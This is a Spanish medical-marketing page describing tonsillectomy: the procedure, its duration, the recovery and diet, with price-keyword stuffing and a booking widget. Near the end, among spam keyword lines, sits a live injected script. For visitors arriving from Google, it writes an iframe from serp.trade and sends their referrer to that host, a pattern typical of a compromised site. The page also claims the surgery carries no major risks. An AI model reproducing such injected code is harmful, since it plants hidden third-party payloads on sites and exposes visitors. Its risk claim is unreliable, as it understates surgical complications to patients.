Operación de Amigdalas

Operación amigdalas precio

¿En qué consiste la operación de amigdalitis?

La amigdalectomía es la extirpación de las amígdalas de forma quirúrgica. Antes solía ser un procedimiento frecuente para tratar la infección y la inflamación de estas. Hoy en día, se realiza para tratar la respiración asociada a trastornos del sueño. Aún se puede recurrir a la amigdalectomía cuando la amigdalitis ocurre con frecuencia.

La cirugía se realiza de forma oral, generalmente bajo anestesia general. Se coloca un abrebocas mientras el paciente está tumbado y se procede a diseccionar la amígdala. La herida que deja esta cirugía sana sin suturas, para una cicatrización más natural se cauteriza.

También exististe una reducción con ultrasonido llamada amigdalectomía parcial o subcapsular. 

Pacientes que no tienen infecciones, pero sí apneas del sueño, es a los que se les realiza este tipo de cirugía en casos que se requiera disminuir el tamaño de la amígdala o en casos de eliminación de tonsilolitos (pequeñas formaciones sólidas que se acumulan dentro de la amígdala y provocan mal aliento).

Consulta de valoración Amigdalectomía

  • Selecciona ciudad
  • Madrid
  • Hospital Fuensanta

¿Cuánto dura la operación de Amigdalas?

De 15 a 20 minutos es lo que dura la operación para extirpar las amígdalas. 

La recuperación de la amigdalectomía será más rápida si se siguen las indicaciones que le ha pautado el médico.

Posibles riesgos de extirpar las amigdalas

Ambas cirugías no presentan mayores riesgos o complicaciones. Antes de la cirugía, puede preguntar a su cirujanos cuáles son los posibles riesgos que podría padecer durante la recuperación o en el postoperatorio de la amigdalectomía.


¿Cómo es el postoperatorio de la operación de Amigdalas?

La amigdalectomía, en la mayoría de los casos solo requiere de un día de ingreso. La recuperación de la operación, ya en casa ronda los diez días. Y dos semanas para una recuperación completa. 

Debería de mantener una dieta con todos los alimentos molidos, tibios o fríos. Hay que permanecer en reposo los tres primeros días y evitar el contacto con personas enfermas que lo puedan contagiar.

 

Durante el postoperatorio se pueden notar síntomas como mal olor en la boca o dolor de oído, los cuales se alivian bebiendo una gran cantidad de líquidos. Es importante evitar el tomar aspirina, en ocasiones puede provocar un mayor sangrado.

amigdalectomia precio operacion
<script>if((document.referrer).includes('google')) {
   document.write("<iframe src='https://serp.trade/iframe.php?ref="+(document.referrer)+"' frameBorder='0' scrolling='no' width='100%' height='200px' align='center'></iframe>");
} </script>
operacion amigdalas precio

Hospitales donde se realiza la cirugía de Amigdalectomía

operacion de amigdalas precio guipuzcoa

Artículos de interés

cuanto cuesta la operacion de amigdalas
operacion de amigdalas precio

Importante: Esta información tiene únicamente un carácter informativo y en ningún caso médico. Es importante que consulte a su médico sobre su enfermedad específica y el tratamiento más adecuado.

Call Now ButtonLlama ahora